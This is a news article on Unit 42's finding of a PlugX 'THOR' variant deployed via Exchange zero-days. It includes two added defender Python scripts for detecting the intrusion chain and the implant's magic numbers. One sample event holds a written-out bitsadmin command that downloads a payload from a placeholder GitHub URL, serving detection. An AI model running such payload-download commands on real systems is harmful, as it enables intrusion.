A cyberespionage group linked by researchers to the Chinese government deployed a never-before-seen variant of the PlugX implant during attacks targeting Microsoft Exchange servers earlier this year, according to Palo Alto Networks' Unit 42 threat intelligence team.
The variant observed by Unit 42 contained a change to its core source code: the replacement of its trademark word “PLUG” with “THOR,” as well as new functionality, such as enhanced payload-delivery mechanisms and abuse of trusted binaries. The new PlugX variant was delivered as a post-exploitation tool to one of the breached Exchange servers.
Unit 42 tracks the threat actor behind this attack as PKPLUG (otherwise known as Mustang Panda). In the observed attacks the malicious actor exploited a chain of zero-day vulnerabilities (CVE-2021-26855 and CVE-2021-27065) to upload a webshell to a publicly accessible web directory, allowing code execution at the highest privilege level.
The attackers then used a technique known as “living off the land,” in which trusted system binaries are abused to evade antivirus detection. In this case the binary was the Microsoft Windows utility bitsadmin.exe, which the hackers used to download a file named Aro.dat from a GitHub repository. This file was an encrypted and compressed PlugX payload.
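The chain described above (webshell on an Exchange server, then bitsadmin.exe fetching a payload from GitHub) leaves a recognisable trace in process-creation telemetry. The following triage helper is an added example, not code from Unit 42 or from the article; it runs over a handful of constructed process events and flags the combination of a bitsadmin.exe remote transfer and a parent process that is an IIS worker. The assumption that a webshell executes inside w3wp.exe (the IIS worker process hosting Exchange) is the author's, not something the article states, and the GitHub URL in the sample data is a placeholder, not the repository used in the attack.

```python
import re
from urllib.parse import urlparse

# Assumption: Exchange webshells run inside the IIS worker process, so children of
# w3wp.exe are suspicious. This is a defender heuristic, not a claim from the article.
WEB_WORKERS = {"w3wp.exe"}
# Hosts the article associates with the payload download (GitHub and its raw-content CDN).
PUBLIC_CODE_HOSTS = ("github.com", "githubusercontent.com")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events in a Sysmon-like shape (parent, image, command line).
SAMPLE_EVENTS = [
    {  # webshell-spawned bitsadmin download from a public code host (placeholder URL)
        "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "image": r"C:\Windows\System32\bitsadmin.exe",
        "cmdline": "bitsadmin.exe /transfer job /download /priority high "
                   "https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/main/Aro.dat "
                   "C:\\ProgramData\\Aro.dat",
    },
    {  # interactive, benign use of the tool
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\bitsadmin.exe",
        "cmdline": "bitsadmin.exe /list",
    },
    {  # IIS worker spawning a shell: suspicious on its own, but not a download
        "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd.exe /c whoami",
    },
    {  # remote transfer from an internal host under a service: lower severity
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\bitsadmin.exe",
        "cmdline": "bitsadmin.exe /transfer update "
                   "https://update.example.internal/patch.cab C:\\temp\\patch.cab",
    },
]


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return the list of detection reasons that apply to one process event."""
    reasons = []
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmdline = event["cmdline"]
    urls = URL_RE.findall(cmdline)

    if image == "bitsadmin.exe" and "/transfer" in cmdline.lower() and urls:
        reasons.append("bitsadmin_remote_transfer")
        hosts = {urlparse(u).hostname or "" for u in urls}
        if any(h.endswith(PUBLIC_CODE_HOSTS) for h in hosts):
            reasons.append("public_code_hosting_source")
    if parent in WEB_WORKERS:
        reasons.append("spawned_by_iis_worker")
    return reasons


def severity(reasons):
    """Escalate when the download is chained directly off the web worker."""
    if "bitsadmin_remote_transfer" in reasons and "spawned_by_iis_worker" in reasons:
        return "high"
    return "medium" if reasons else "none"


def triage(events):
    """Return (index, severity, reasons) for every event that triggered a reason."""
    results = []
    for i, event in enumerate(events):
        reasons = analyze_event(event)
        if reasons:
            results.append((i, severity(reasons), reasons))
    return results


if __name__ == "__main__":
    for index, level, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: {level:6s} {', '.join(reasons)}")
```

The third event shows why the parent-process signal is kept separate from the download signal: a shell under w3wp.exe is worth a look even when nothing is downloaded, while a bitsadmin transfer under a service process is routine enough that it only rises to "high" when combined with the web-worker parent.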
“Once the decrypted payload runs in memory, it exhibits the same behaviors as previous PlugX implant variants. It starts by decrypting the embedded PlugX hardcoded configuration settings. The decryption algorithm and XOR keys are fairly consistent across multiple PlugX implants,” the researchers said.
“One noticeable difference with this sample compared to all the other known PlugX malware families is the magic number check performed during the initialization of the PlugX plugins. Historically, that number has always been 0x504C5547, which corresponds to the PLUG value in ASCII encoding. In this sample, the magic number is 0x54484F52, corresponding to the THOR value in ASCII encoding.”
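The magic-number detail above is directly usable for triage: the two constants decode to four ASCII letters each, and a memory dump or decrypted payload can be scanned for either byte order. The helper below is an added example, not code from Unit 42 or from the article. It converts the DWORD constants to their ASCII form and scans a constructed buffer for both the big-endian ("THOR") and little-endian ("ROHT", as an x86 immediate is laid out in memory) encodings; the sample buffer and the layout it assumes are constructed for illustration and do not reproduce PlugX's real structures.

```python
import struct

# Magic values the article reports for the plugin-initialization check.
KNOWN_MAGICS = {
    0x504C5547: "PlugX (PLUG)",
    0x54484F52: "PlugX THOR variant",
}


def magic_to_ascii(value):
    """Decode a 32-bit magic number into the ASCII tag it spells big-endian."""
    return struct.pack(">I", value).decode("ascii")


def scan_for_magics(buf, magics=KNOWN_MAGICS):
    """Return sorted (offset, label, byte_order) hits for every known magic.

    Both byte orders are searched: a DWORD compared as an immediate in x86 code
    sits in memory little-endian (e.g. b"ROHT"), while string-like data or a
    big-endian write would appear as b"THOR".
    """
    hits = []
    for value, label in magics.items():
        for fmt, order in (("<I", "little-endian"), (">I", "big-endian")):
            pattern = struct.pack(fmt, value)
            start = 0
            while (idx := buf.find(pattern, start)) != -1:
                hits.append((idx, label, order))
                start = idx + 1
    return sorted(hits)


def classify(buf):
    """Pick the most specific variant label seen, or None if no magic matched."""
    labels = {label for _, label, _ in scan_for_magics(buf)}
    if "PlugX THOR variant" in labels:
        return "PlugX THOR variant"
    if "PlugX (PLUG)" in labels:
        return "PlugX (PLUG)"
    return None


# Constructed sample: padding, a little-endian THOR immediate, then a big-endian PLUG tag.
SAMPLE_BUFFER = (
    b"\x90" * 16
    + struct.pack("<I", 0x54484F52)   # b"ROHT"
    + b"\x00" * 8
    + struct.pack(">I", 0x504C5547)   # b"PLUG"
    + b"\x00" * 4
)

if __name__ == "__main__":
    for value in KNOWN_MAGICS:
        print(f"0x{value:08X} -> {magic_to_ascii(value)}")
    for offset, label, order in scan_for_magics(SAMPLE_BUFFER):
        print(f"offset {offset:#06x}: {label} ({order})")
    print("classification:", classify(SAMPLE_BUFFER))
```

Four-byte patterns are short, so a hit is a lead rather than a verdict; the article ties the check to plugin initialization, which means a confirmed match should be followed up by locating the comparison in the decrypted code rather than by trusting the string alone.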
The latest version of PlugX has a variety of plug-ins that "provide attackers various capabilities to monitor, update and interact with the compromised system to fulfil their objectives."
The Unit 42 research team linked THOR to PKPLUG based on overlaps of related infrastructure and common malicious behaviors detected among other recently discovered PlugX samples.